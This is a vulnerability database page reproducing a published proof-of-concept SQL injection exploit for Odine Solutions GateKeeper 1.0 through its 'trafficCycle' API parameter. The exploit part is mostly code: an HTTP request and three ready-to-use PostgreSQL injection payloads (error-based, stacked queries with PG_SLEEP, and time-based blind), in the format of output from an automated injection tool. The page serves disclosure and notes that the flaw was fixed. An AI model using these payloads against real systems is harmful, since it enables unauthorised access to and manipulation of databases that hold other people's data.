Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Odine Solutions GateKeeper 1.0 SQL Injection

🗓️ 06 Oct 2021 00:00:00Reported by Emel BasayarType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 269 Views

Odine Solutions GateKeeper 1.0 SQL Injection vulnerability discovered in trafficCycle paramete

Code
`# Exploit Title: Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection  
# Date: 05.10.2021  
# Exploit Author: Emel Basayar  
# Vendor: Odine Solutions - odinesolutions.com  
# Vendor Homepage: https://odinesolutions.com/software/gatekeeper-simbox-antifraud/  
# Version: 1.0  
# Category: Webapps  
# Tested on: Ubuntu 18 TLS  
# Description : The vulnerability allows an attacker to inject sql commands from search section with 'trafficCycle' parameter.  
# This vulnerability was discovered during the penetration testing and the vulnerability was fixed.  
====================================================  
  
# PoC : SQLi :  
  
GET /rass/api/v1/trafficCycle/98 HTTP/1.1  
Host: 192.168.1.25  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0  
Accept: application/json  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Authorization: Bearer xm38HruG-htx0jNuM-l9UBCkoz-G7RigZvx  
Origin: https://192.168.1.25  
Connection: close  
Referer: https://192.168.1.25  
  
Parameter: #1* (URI)  
Type: error-based  
Title: PostgreSQL AND error-based - WHERE or HAVING clause  
Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 5042=CAST((CHR(113)||CHR(118)||CHR(112)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (5042=5042) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(98)||CHR(120)||CHR(113)) AS NUMERIC)-- yrdB  
  
Type: stacked queries  
Title: PostgreSQL > 8.1 stacked queries (comment)  
Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98';SELECT PG_SLEEP(5)--  
  
Type: time-based blind  
Title: PostgreSQL > 8.1 AND time-based blind  
Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 9405=(SELECT 9405 FROM PG_SLEEP(5))-- PasC  
---  
web application technology: Nginx  
back-end DBMS: PostgreSQL  
  
====================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Oct 2021 00:00Current
0.4Low risk
Vulners AI Score0.4
odine solutionsgatekeeper 1.0sql injectionwebappsnginxpostgresql
269